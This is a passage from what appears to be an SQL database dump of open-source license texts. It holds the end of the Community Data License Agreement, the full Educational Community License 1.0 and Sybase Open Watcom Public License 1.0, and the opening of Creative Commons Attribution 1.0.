Enhanced\nData) available in any manner which enables its Use, including by providing\na copy on physical media or remote access. For any form of Entity, that is\nto make the Data available to any individual who is not employed by that Entity\nor engaged as a contractor or agent to perform work on that Entity\'s behalf.\nA \"Publication\" occurs each time You Publish Data.\n\n1.10 \"Receive\" or \"Receives\" means to have been given access to Data, locally\nor remotely.\n\n1.11 \"Results\" means the outcomes or outputs that You obtain from Your Computational\nUse of Data. Results shall not include more than a de minimis portion of the\nData on which the Computational Use is based.\n\n1.12 \"Sui Generis Database Rights\" means rights, other than copyright, resulting\nfrom Directive 96/9/EC of the European Parliament and of the Council of 11\nMarch 1996 on the legal protection of databases, as amended and/or succeeded,\nas well as other equivalent rights anywhere in the world.\n\n1.13 \"Use\" means using Data (including accessing, copying, studying, reviewing,\nadapting, analyzing, evaluating, or making Computational Use of it), either\nby machines or humans, or a combination of both.\n\n1.14 \"You\" or \"Your\" means any Entity that Receives Data under this Agreement.\n\n Section 2. Right and License to Use and to Publish\n\n2.1 Subject to the conditions set forth in Section 3 of this Agreement, Data\nProvider(s) hereby grant(s) to You a worldwide, non-exclusive, irrevocable\n(except as provided in Section 5) right to: (a) Use Data; and (b) Publish\nData.\n\n2.2 To the extent that the Data or the coordination, selection or arrangement\nof Data is protected or protectable under copyright, Sui Generis Database\nRights, or other law, Data Provider(s) further agree(s) that such Data or\ncoordination, selection or arrangement is hereby licensed to You and to anyone\nelse who Receives Data under this Agreement for Use and Publication, subject\nto the conditions set forth in Section 3 of this Agreement.\n\n2.3 Except for these rights and licenses expressly granted, no other intellectual\nproperty rights are granted or should be implied.\n\n Section 3. Conditions on Rights Granted\n\n 3.1 If You Publish Data You Receive or Enhanced Data:\n\n(a) The Data (including the Enhanced Data) must be Published under this Agreement\nin accordance with this Section 3; and\n\n(b) You must cause any Data files containing Enhanced Data to carry prominent\nnotices that You have changed those files; and\n\n(c) If You Publish Data You Receive, You must preserve all credit or attribution\nto the Data Provider(s). Such retained credit or attribution includes any\nof the following to the extent they exist in Data as You have Received it:\nlegal notices or metadata; identification of the Data Provider(s); or hyperlinks\nto Data to the extent it is practical to do so.\n\n3.2 You may not restrict or deter the ability of anyone who Receives the Data\n(a) to Publish the Data in a publicly-accessible manner or (b) if the project\nhas designated a Ledger for recording Data or grants of rights in Data for\npurposes of this Agreement, to record the Data or grants of rights in Data\nin the Ledger.\n\n3.3 If You Publish Data You Receive, You must do so under an unmodified form\nof this Agreement and include the text of this Agreement, the name of this\nAgreement and/or a hyperlink or other method reasonably likely to provide\na copy of the text of this Agreement. You may not modify this Agreement or\nimpose any further restrictions on the exercise of the rights granted under\nthis Agreement, including by adding any restriction on commercial or non-commercial\nUse of Data (including Your Enhanced Data) or by limiting permitted Use of\nsuch Data to any particular platform, technology or field of endeavor. Notices\nthat purport to modify this Agreement shall be of no effect.\n\n3.4 You and each Data Provider agree that Enhanced Data shall not be considered\na work of joint authorship by virtue of its relationship to Data licensed\nunder this Agreement and shall not require either any obligation of accounting\nto or the consent of any Data Provider.\n\n3.5 This Agreement imposes no obligations or restrictions on Your Use or Publication\nof Results.\n\n Section 4. Data Provider(s)\' Representations\n\n4.1 Each Data Provider represents that the Data Provider has exercised reasonable\ncare, to assure that: (a) the Data it Publishes was created or generated by\nit or was obtained from others with the right to Publish the Data under this\nAgreement; and (b) Publication of such Data does not violate any privacy or\nconfidentiality obligation undertaken by the Data Provider.\n\n Section 5. Termination\n\n5.1 All of Your rights under this Agreement will terminate, and Your right\nto Receive, Use or Publish the Data will be revoked or modified if You materially\nfail to comply with the terms and conditions of this Agreement and You do\nnot cure such failure in a reasonable period of time after becoming aware\nof such noncompliance. If Your rights under this Agreement terminate, You\nagree to cease Receipt, Use and Publication of Data. However, Your obligations\nand any rights and permissions granted by You under this Agreement relating\nto Data that You Published prior to such termination will continue and survive.\n\n5.2 If You institute litigation against a Data Provider or anyone else who\nReceives the Data (including a cross-claim in a lawsuit) based on the Data,\nother than a claim asserting breach of this Agreement, then any rights previously\ngranted to You to Receive, Use and Publish Data under this Agreement will\nterminate as of the date such litigation is filed.\n\n Section 6. Disclaimer of Warranties and Limitation of Liability\n\n6.1 EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE DATA (INCLUDING ENHANCED\nDATA) IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\nANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES\nOR CONDITIONS OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A\nPARTICULAR PURPOSE.\n\n6.2 NEITHER YOU NOR ANY DATA PROVIDERS SHALL HAVE ANY LIABILITY FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING\nWITHOUT LIMITATION LOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\nWHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE DATA OR THE EXERCISE\nOF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGES.\n\n Section 7. Miscellaneous\n\n7.1 You agree that it is solely Your responsibility to comply with all applicable\nlaws with regard to Your Use or Publication of Data, including any applicable\nprivacy, data protection, security and export laws. You agree to take reasonable\nsteps to assist a Data Provider fulfilling responsibilities to comply with\napplicable laws with regard to Use or Publication of Data Received hereunder.\n\n7.2 You and Data Provider(s), collectively and individually, waive and/or\nagree not to assert, to the extent permitted by law, any moral rights You\nor they hold in Data.\n\n7.3 This Agreement confers no rights or remedies upon any person or entity\nother than the Parties and their respective heirs, executors, successors and\nassigns.\n\n7.4 The Data Provider(s) reserve no right or expectation of privacy, data\nprotection or confidentiality in any Data that they Publish under this Agreement.\nIf You choose to Publish Data under this Agreement, You similarly do so with\nno reservation or expectation of any rights of privacy or confidentiality\nin that Data.\n\n7.5 The Community Data License Agreement workgroup under The Linux Foundation\nis the steward of this Agreement (\"Steward\"). No one other than the Steward\nhas the right to modify or publish new versions of this Agreement. Each version\nwill be given a distinguishing version number. You may Use and Publish Data\nReceived hereunder under the terms of the version of the Agreement under which\nYou originally Received the Data, or under the terms of any subsequent version\npublished by the Steward.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(296,'ECL-1.0','The Educational Community License\n\nThis Educational Community License (the \"License\") applies to any original\nwork of authorship (the \"Original Work\") whose owner (the \"Licensor\") has\nplaced the following notice immediately following the copyright notice for\nthe Original Work:\n\nCopyright (c) <year> <copyright holders>\n\nLicensed under the Educational Community License version 1.0\n\nThis Original Work, including software, source code, documents, or other related\nitems, is being provided by the copyright holder(s) subject to the terms of\nthe Educational Community License. By obtaining, using and/or copying this\nOriginal Work, you agree that you have read, understand, and will comply with\nthe following terms and conditions of the Educational Community License:\n\nPermission to use, copy, modify, merge, publish, distribute, and sublicense\nthis Original Work and its documentation, with or without modification, for\nany purpose, and without fee or royalty to the copyright holder(s) is hereby\ngranted, provided that you include the following on ALL copies of the Original\nWork or portions thereof, including modifications or derivatives, that you\nmake:\n\nThe full text of the Educational Community License in a location viewable\nto users of the redistributed or derivative work.\n\nAny pre-existing intellectual property disclaimers, notices, or terms and\nconditions.\n\nNotice of any changes or modifications to the Original Work, including the\ndate the changes were made.\n\nAny modifications of the Original Work must be distributed in such a manner\nas to avoid any confusion with the Original Work of the copyright holders.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nOR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF\nOR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nThe name and trademarks of copyright holder(s) may NOT be used in advertising\nor publicity pertaining to the Original or Derivative Works without specific,\nwritten prior permission. Title to copyright in the Original Work and any\nassociated documentation will at all times remain with the copyright holders.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(297,'Watcom-1.0','Sybase Open Watcom Public License version 1.0\n\nUSE OF THE SYBASE OPEN WATCOM SOFTWARE DESCRIBED BELOW (\"SOFTWARE\") IS SUBJECT\nTO THE TERMS AND CONDITIONS SET FORTH IN THE SYBASE OPEN WATCOM PUBLIC LICENSE\nSET FORTH BELOW (\"LICENSE\"). YOU MAY NOT USE THE SOFTWARE IN ANY MANNER UNLESS\nYOU ACCEPT THE TERMS AND CONDITIONS OF THE LICENSE. YOU INDICATE YOUR ACCEPTANCE\nBY IN ANY MANNER USING (INCLUDING WITHOUT LIMITATION BY REPRODUCING, MODIFYING\nOR DISTRIBUTING) THE SOFTWARE. IF YOU DO NOT ACCEPT ALL OF THE TERMS AND CONDITIONS\nOF THE LICENSE, DO NOT USE THE SOFTWARE IN ANY MANNER.\n\nSybase Open Watcom Public License version 1.0\n\n1. General; Definitions. This License applies only to the following software\nprograms: the open source versions of Sybase\'s Watcom C/C++ and Fortran compiler\nproducts (\"Software\"), which are modified versions of, with significant changes\nfrom, the last versions made commercially available by Sybase. As used in\nthis License:\n\n1.1 \"Applicable Patent Rights\" mean: (a) in the case where Sybase is the grantor\nof rights, (i) claims of patents that are now or hereafter acquired, owned\nby or assigned to Sybase and (ii) that cover subject matter contained in the\nOriginal Code, but only to the extent necessary to use, reproduce and/or distribute\nthe Original Code without infringement; and (b) in the case where You are\nthe grantor of rights, (i) claims of patents that are now or hereafter acquired,\nowned by or assigned to You and (ii) that cover subject matter in Your Modifications,\ntaken alone or in combination with Original Code.\n\n1.2 \"Contributor\" means any person or entity that creates or contributes to\nthe creation of Modifications.\n\n1.3 \"Covered Code\" means the Original Code, Modifications, the combination\nof Original Code and any Modifications, and/or any respective portions thereof.\n\n1.4 \"Deploy\" means to use, sublicense or distribute Covered Code other than\nfor Your internal research and development (R&D) and/or Personal Use, and\nincludes without limitation, any and all internal use or distribution of Covered\nCode within Your business or organization except for R&D use and/or Personal\nUse, as well as direct or indirect sublicensing or distribution of Covered\nCode by You to any third party in any form or manner.\n\n1.5 \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n1.6 \"Modifications\" mean any addition to, deletion from, and/or change to,\nthe substance and/or structure of the Original Code, any previous Modifications,\nthe combination of Original Code and any previous Modifications, and/or any\nrespective portions thereof. When code is released as a series of files, a\nModification is: (a) any addition to or deletion from the contents of a file\ncontaining Covered Code; and/or (b) any new file or other representation of\ncomputer program statements that contains any part of Covered Code.\n\n1.7 \"Original Code\" means (a) the Source Code of a program or other work as\noriginally made available by Sybase under this License, including the Source\nCode of any updates or upgrades to such programs or works made available by\nSybase under this License, and that has been expressly identified by Sybase\nas such in the header file(s) of such work; and (b) the object code compiled\nfrom such Source Code and originally made available by Sybase under this License.\n\n1.8 \"Personal Use\" means use of Covered Code by an individual solely for his\nor her personal, private and non-commercial purposes. An individual\'s use\nof Covered Code in his or her capacity as an officer, employee, member, independent\ncontractor or agent of a corporation, business or organization (commercial\nor non-commercial) does not qualify as Personal Use.\n\n1.9 \"Source Code\" means the human readable form of a program or other work\nthat is suitable for making modifications to it, including all modules it\ncontains, plus any associated interface definition files, scripts used to\ncontrol compilation and installation of an executable (object code).\n\n1.10 \"You\" or \"Your\" means an individual or a legal entity exercising rights\nunder this License. For legal entities, \"You\" or \"Your\" includes any entity\nwhich controls, is controlled by, or is under common control with, You, where\n\"control\" means (a) the power, direct or indirect, to cause the direction\nor management of such entity, whether by contract or otherwise, or (b) ownership\nof fifty percent (50%) or more of the outstanding shares or beneficial ownership\nof such entity.\n\n2. Permitted Uses; Conditions & Restrictions.Subject to the terms and conditions\nof this License, Sybase hereby grants You, effective on the date You accept\nthis License and download the Original Code, a world-wide, royalty-free, non-exclusive\nlicense, to the extent of Sybase\'s Applicable Patent Rights and copyrights\ncovering the Original Code, to do the following:\n\n2.1 You may use, reproduce, display, perform, modify and distribute Original\nCode, with or without Modifications, solely for Your internal research and\ndevelopment and/or Personal Use, provided that in each instance:\n\n(a) You must retain and reproduce in all copies of Original Code the copyright\nand other proprietary notices and disclaimers of Sybase as they appear in\nthe Original Code, and keep intact all notices in the Original Code that refer\nto this License; and\n\n(b) You must retain and reproduce a copy of this License with every copy of\nSource Code of Covered Code and documentation You distribute, and You may\nnot offer or impose any terms on such Source Code that alter or restrict this\nLicense or the recipients\' rights hereunder, except as permitted under Section\n6.\n\n(c) Whenever reasonably feasible you should include the copy of this License\nin a click-wrap format, which requires affirmative acceptance by clicking\non an \"I accept\" button or similar mechanism. If a click-wrap format is not\nincluded, you must include a statement that any use (including without limitation\nreproduction, modification or distribution) of the Software, and any other\naffirmative act that you define, constitutes acceptance of the License, and\ninstructing the user not to use the Covered Code in any manner if the user\ndoes not accept all of the terms and conditions of the License.\n\n2.2 You may use, reproduce, display, perform, modify and Deploy Covered Code,\nprovided that in each instance:\n\n(a) You must satisfy all the conditions of Section 2.1 with respect to the\nSource Code of the Covered Code;\n\n(b) You must duplicate, to the extent it does not already exist, the notice\nin Exhibit A in each file of the Source Code of all Your Modifications, and\ncause the modified files to carry prominent notices stating that You changed\nthe files and the date of any change;\n\n(c) You must make Source Code of all Your Deployed Modifications publicly\navailable under the terms of this License, including the license grants set\nforth in Section 3 below, for as long as you Deploy the Covered Code or twelve\n(12) months from the date of initial Deployment, whichever is longer. You\nshould preferably distribute the Source Code of Your Deployed Modifications\nelectronically (e.g. download from a web site);\n\n(d) if You Deploy Covered Code in object code, executable form only, You must\ninclude a prominent notice, in the code itself as well as in related documentation,\nstating that Source Code of the Covered Code is available under the terms\nof this License with information on how and where to obtain such Source Code;\nand\n\n(e) the object code form of the Covered Code may be distributed under Your\nown license agreement, provided that such license agreement contains terms\nno less protective of Sybase and each Contributor than the terms of this License,\nand stating that any provisions which differ from this License are offered\nby You alone and not by any other party.\n\n2.3 You expressly acknowledge and agree that although Sybase and each Contributor\ngrants the licenses to their respective portions of the Covered Code set forth\nherein, no assurances are provided by Sybase or any Contributor that the Covered\nCode does not infringe the patent or other intellectual property rights of\nany other entity. Sybase and each Contributor disclaim any liability to You\nfor claims brought by any other entity based on infringement of intellectual\nproperty rights or otherwise. As a condition to exercising the rights and\nlicenses granted hereunder, You hereby assume sole responsibility to secure\nany other intellectual property rights needed, if any. For example, if a third\nparty patent license is required to allow You to distribute the Covered Code,\nit is Your responsibility to acquire that license before distributing the\nCovered Code.\n\n3. Your Grants. In consideration of, and as a condition to, the licenses granted\nto You under this License, You hereby grant to Sybase and all third parties\na non-exclusive, royalty-free license, under Your Applicable Patent Rights\nand other intellectual property rights (other than patent) owned or controlled\nby You, to use, reproduce, display, perform, modify, distribute and Deploy\nYour Modifications of the same scope and extent as Sybase\'s licenses under\nSections 2.1 and 2.2.\n\n4. Larger Works. You may create a Larger Work by combining Covered Code with\nother code not governed by the terms of this License and distribute the Larger\nWork as a single product. In each such instance, You must make sure the requirements\nof this License are fulfilled for the Covered Code or any portion thereof.\n\n5. Limitations on Patent License. Except as expressly stated in Section 2,\nno other patent rights, express or implied, are granted by Sybase herein.\nModifications and/or Larger Works may require additional patent licenses from\nSybase which Sybase may grant in its sole discretion.\n\n6. Additional Terms. You may choose to offer, and to charge a fee for, warranty,\nsupport, indemnity or liability obligations and/or other rights consistent\nwith this License (\"Additional Terms\") to one or more recipients of Covered\nCode. However, You may do so only on Your own behalf and as Your sole responsibility,\nand not on behalf of Sybase or any Contributor. You must obtain the recipient\'s\nagreement that any such Additional Terms are offered by You alone, and You\nhereby agree to indemnify, defend and hold Sybase and every Contributor harmless\nfor any liability incurred by or claims asserted against Sybase or such Contributor\nby reason of any such Additional Terms.\n\n7. Versions of the License. Sybase may publish revised and/or new versions\nof this License from time to time. Each version will be given a distinguishing\nversion number. Once Original Code has been published under a particular version\nof this License, You may continue to use it under the terms of that version.\nYou may also choose to use such Original Code under the terms of any subsequent\nversion of this License published by Sybase. No one other than Sybase has\nthe right to modify the terms applicable to Covered Code created under this\nLicense.\n\n8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in part\npre-release, untested, or not fully tested works. The Covered Code may contain\nerrors that could cause failures or loss of data, and may be incomplete or\ncontain inaccuracies. You expressly acknowledge and agree that use of the\nCovered Code, or any portion thereof, is at Your sole and entire risk. THE\nCOVERED CODE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY, UPGRADES OR SUPPORT\nOF ANY KIND AND SYBASE AND SYBASE\'S LICENSOR(S) (COLLECTIVELY REFERRED TO\nAS \"SYBASE\" FOR THE PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY\nDISCLAIM ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF MERCHANTABILITY,\nOF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR PURPOSE, OF ACCURACY,\nOF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD PARTY RIGHTS. SYBASE AND\nEACH CONTRIBUTOR DOES NOT WARRANT AGAINST INTERFERENCE WITH YOUR ENJOYMENT\nOF THE COVERED CODE, THAT THE FUNCTIONS CONTAINED IN THE COVERED CODE WILL\nMEET YOUR REQUIREMENTS, THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED\nOR ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO ORAL\nOR WRITTEN INFORMATION OR ADVICE GIVEN BY SYBASE, A SYBASE AUTHORIZED REPRESENTATIVE\nOR ANY CONTRIBUTOR SHALL CREATE A WARRANTY. You acknowledge that the Covered\nCode is not intended for use in the operation of nuclear facilities, aircraft\nnavigation, communication systems, or air traffic control machines in which\ncase the failure of the Covered Code could lead to death, personal injury,\nor severe physical or environmental damage.\n\n9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO EVENT\nSHALL SYBASE OR ANY CONTRIBUTOR BE LIABLE FOR ANY DIRECT, INCIDENTAL, SPECIAL,\nINDIRECT, CONSEQUENTIAL OR OTHER DAMAGES OF ANY KIND ARISING OUT OF OR RELATING\nTO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE COVERED CODE, OR ANY PORTION\nTHEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY, TORT (INCLUDING NEGLIGENCE),\nPRODUCTS LIABILITY OR OTHERWISE, EVEN IF SYBASE OR SUCH CONTRIBUTOR HAS BEEN\nADVISED OF THE POSSIBILITY OF SUCH DAMAGES, AND NOTWITHSTANDING THE FAILURE\nOF ESSENTIAL PURPOSE OF ANY REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION\nOF LIABILITY OF INCIDENTAL OR CONSEQUENTIAL OR OTHER DAMAGES OF ANY KIND,\nSO THIS LIMITATION MAY NOT APPLY TO YOU. In no event shall Sybase\'s or any\nContributor\'s total liability to You for all damages (other than as may be\nrequired by applicable law) under this License exceed the amount of five hundred\ndollars ($500.00).\n\n10. Trademarks. This License does not grant any rights to use the trademarks\nor trade names \"Sybase\" or any other trademarks or trade names belonging to\nSybase (collectively \"Sybase Marks\") or to any trademark or trade name belonging\nto any Contributor(\"Contributor Marks\"). No Sybase Marks or Contributor Marks\nmay be used to endorse or promote products derived from the Original Code\nor Covered Code other than with the prior written consent of Sybase or the\nContributor, as applicable.\n\n11. Ownership. Subject to the licenses granted under this License, each Contributor\nretains all rights, title and interest in and to any Modifications made by\nsuch Contributor. Sybase retains all rights, title and interest in and to\nthe Original Code and any Modifications made by or on behalf of Sybase (\"Sybase\nModifications\"), and such Sybase Modifications will not be automatically subject\nto this License. Sybase may, at its sole discretion, choose to license such\nSybase Modifications under this License, or on different terms from those\ncontained in this License or may choose not to license them at all.\n\n 12. Termination.\n\n12.1 Termination. This License and the rights granted hereunder will terminate:\n\n(a) automatically without notice if You fail to comply with any term(s) of\nthis License and fail to cure such breach within 30 days of becoming aware\nof such breach;\n\n(b) immediately in the event of the circumstances described in Section 13.5(b);\nor\n\n(c) automatically without notice if You, at any time during the term of this\nLicense, commence an action for patent infringement (including as a cross\nclaim or counterclaim) against Sybase or any Contributor.\n\n12.2 Effect of Termination. Upon termination, You agree to immediately stop\nany further use, reproduction, modification, sublicensing and distribution\nof the Covered Code and to destroy all copies of the Covered Code that are\nin your possession or control. All sublicenses to the Covered Code that have\nbeen properly granted prior to termination shall survive any termination of\nthis License. Provisions which, by their nature, should remain in effect beyond\nthe termination of this License shall survive, including but not limited to\nSections 3, 5, 8, 9, 10, 11, 12.2 and 13. No party will be liable to any other\nfor compensation, indemnity or damages of any sort solely as a result of terminating\nthis License in accordance with its terms, and termination of this License\nwill be without prejudice to any other right or remedy of any party.\n\n 13. Miscellaneous.\n\n13.1 Government End Users. The Covered Code is a \"commercial item\" as defined\nin FAR 2.101. Government software and technical data rights in the Covered\nCode include only those rights customarily provided to the public as defined\nin this License. This customary commercial license in technical data and software\nis provided in accordance with FAR 12.211 (Technical Data) and 12.212 (Computer\nSoftware) and, for Department of Defense purchases, DFAR 252.227-7015 (Technical\nData -- Commercial Items) and 227.7202-3 (Rights in Commercial Computer Software\nor Computer Software Documentation). Accordingly, all U.S. Government End\nUsers acquire Covered Code with only those rights set forth herein.\n\n13.2 Relationship of Parties. This License will not be construed as creating\nan agency, partnership, joint venture or any other form of legal association\nbetween or among you, Sybase or any Contributor, and You will not represent\nto the contrary, whether expressly, by implication, appearance or otherwise.\n\n13.3 Independent Development. Nothing in this License will impair Sybase\'s\nor any Contributor\'s right to acquire, license, develop, have others develop\nfor it, market and/or distribute technology or products that perform the same\nor similar functions as, or otherwise compete with, Modifications, Larger\nWorks, technology or products that You may develop, produce, market or distribute.\n\n13.4 Waiver; Construction. Failure by Sybase or any Contributor to enforce\nany provision of this License will not be deemed a waiver of future enforcement\nof that or any other provision. Any law or regulation which provides that\nthe language of a contract shall be construed against the drafter will not\napply to this License.\n\n13.5 Severability. (a) If for any reason a court of competent jurisdiction\nfinds any provision of this License, or portion thereof, to be unenforceable,\nthat provision of the License will be enforced to the maximum extent permissible\nso as to effect the economic benefits and intent of the parties, and the remainder\nof this License will continue in full force and effect. (b) Notwithstanding\nthe foregoing, if applicable law prohibits or restricts You from fully and/or\nspecifically complying with Sections 2 and/or 3 or prevents the enforceability\nof either of those Sections, this License will immediately terminate and You\nmust immediately discontinue any use of the Covered Code and destroy all copies\nof it that are in your possession or control.\n\n13.6 Dispute Resolution. Any litigation or other dispute resolution between\nYou and Sybase relating to this License shall take place in the Northern District\nof California, and You and Sybase hereby consent to the personal jurisdiction\nof, and venue in, the state and federal courts within that District with respect\nto this License. The application of the United Nations Convention on Contracts\nfor the International Sale of Goods is expressly excluded.\n\n13.7 Entire Agreement; Governing Law. This License constitutes the entire\nagreement between the parties with respect to the subject matter hereof. This\nLicense shall be governed by the laws of the United States and the State of\nCalifornia, except that body of California law concerning conflicts of law.\n\nWhere You are located in the province of Quebec, Canada, the following clause\napplies: The parties hereby confirm that they have requested that this License\nand all related documents be drafted in English. Les parties ont exigè que\nle prèsent contrat et tous les documents connexes soient rèdiès en anglais.\nEXHIBIT A.\n\n\"Portions Copyright (c) 1983-2002 Sybase, Inc. All Rights Reserved.\n\nThis file contains Original Code and/or Modifications of Original Code as\ndefined in and that are subject to the Sybase Open Watcom Public License version\n1.0 (the \'License\'). You may not use this file except in compliance with the\nLicense. BY USING THIS FILE YOU AGREE TO ALL TERMS AND CONDITIONS OF THE LICENSE.\nA copy of the License is provided with the Original Code and Modifications,\nand is also available at www.sybase.com/developer/opensource.\n\nThe Original Code and all software distributed under the License are distributed\non an \'AS IS\' basis, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED,\nAND SYBASE AND ALL CONTRIBUTORS HEREBY DISCLAIM ALL SUCH WARRANTIES, INCLUDING\nWITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR\nPURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. Please see the License for the\nspecific language governing rights and limitations under the License.\"\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(298,'CC-BY-1.0','Creative Commons Attribution 1.0 CREATIVE COMMONS CORPORATION IS NOT A LAW\nFIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS DRAFT LICENSE\nDOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES\nTHIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\n b. to create and reproduce Derivative Works;\n\nc. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nd. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission Derivative Works;\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nAll rights not expressly granted by Licensor are hereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested. If You create a Derivative Work, upon notice from any\nLicensor You must, to the extent practicable, remove from the Derivative Work\nany reference to such Licensor or the Original Author, as requested.\n\nb. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work or any Derivative Works or Collective Works, You must keep\nintact all copyright notices for the Work and give the Original Author credit\nreasonable to the medium or means You are utilizing by conveying the name\n(or pseudonym if applicable) of the Original Author if supplied; the title\nof the Work if supplied; in the case of a Derivative Work, a credit identifying\nthe use of the Work in the Derivative Work (e.g., \"French translation of the\nWork by Original Author,\" or \"Screenplay based on original Work by Original\nAuthor\"). Such credit may be implemented in any reasonable manner; provided,\nhowever, that in the case of a Derivative Work or Collective Work, at a minimum\nsuch credit will appear where any other comparable authorship credit appears\nand in a manner at least as prominent as such other comparable authorship\ncredit.\n\n 5. Representations, Warranties and Disclaimer\n\na. By offering the Work for public release under this License, Licensor represents\nand warrants that, to the best of Licensor\'s knowledge after reasonable inquiry:\n\ni. Licensor has secured all rights in the Work necessary to grant the 